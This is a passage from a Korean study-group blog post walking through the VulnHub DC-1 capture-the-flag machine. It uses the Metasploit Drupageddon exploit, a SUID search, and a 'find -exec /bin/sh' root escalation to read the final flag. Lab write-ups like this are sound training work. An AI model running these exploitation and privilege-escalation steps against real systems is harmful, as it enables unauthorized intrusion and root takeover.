[DC :1 후반부]
flag4를 읽어 보려고 하니 디렉토리라고 하기에 cd flag4로 flag4디렉토리 안에 들어가주었다.
ls를 해보니 flag4.txt가 있기에 cat flag.txt를 통해 파일을 읽어주었다.
msfconsole에 들어가서 use exploit/multi/http/drupal_drupageddon을 해주고 rhost를 해당 ip주소로 설정해준다. 그런다음 exploit 을 진행한다.
shell에 들어가서 flag4를 읽어주는 방법도 있다.
find / -perm -4000 2>/dev/null
-perm : find 명령어중 하나로 -perm 옵션은 특정 실행권한을 찾을 수 있게 해준다.
-perm 옵션을 사용할때 찾고자 하는 실행권한을 숫자형식으로 입력한다.
ex) find / -perm -800 (파일 권한이 800인 찾아라.)
2>/dev/null : 표준에러로 에러메시지를 출력한다.
표준에러를 /dev/null로 redirection한다. (에러메시지를 null로)
$find . -exec /bin/sh \; -quit
-exec : 조건을 가지고 찾은 파일들을 대상으로 다음 명령어를 실행하라는 의미를 가지고 있다. (find 조건 -exec 실행시킬 명령어 \; 로 사용)
-quit: 검색 조건에 해당하는 결과가 하나라도 나올 경우에 검색을 종료한다.
find명령어로 현재 위치(.)로부터 실행해서 /bin/sh에서 원하는 결과가 나올 경우에 검색을 종료한다.
$ls -al /root
root디렉토리의 리스트들을 확인하고자 명령어를 실행했더니 finalflag가 담겨져 있는 thefinalflag.txt 파일을 찾았다.
$cat /root/thefinalflag.txt
cat 명령어를 이용해서 /root/thefinalflag.txt의 내용을 출력하면 다음과 같이
“Well done!!!!”이라는 최종 값을 확인할 수 있다.
'4-8. 2021-1 심화 스터디 > vulnhub을 활용한 시나리오 모의해킹 CTF 문제풀이' 카테고리의 다른 글
[2021.05.22] 8주차 : vulnhub prime:1분석 및 wargame풀이 (0) | 2021.05.22 |
---|---|
[2021.05.15] 7주차 : vulnhub 모의해킹 실습 - Prime:1 (0) | 2021.05.15 |
[2021.05.01] 5주차 : vulnhub 모의해킹 실습 - DC 1 (0) | 2021.05.01 |
[2021.03.27] 3주차 : vulnhub 모의해킹 실습 - chanakya (0) | 2021.03.27 |
[2021.03.20] 2주차 : vulnhub 모의해킹 실습 - kioptrix2014 (0) | 2021.03.20 |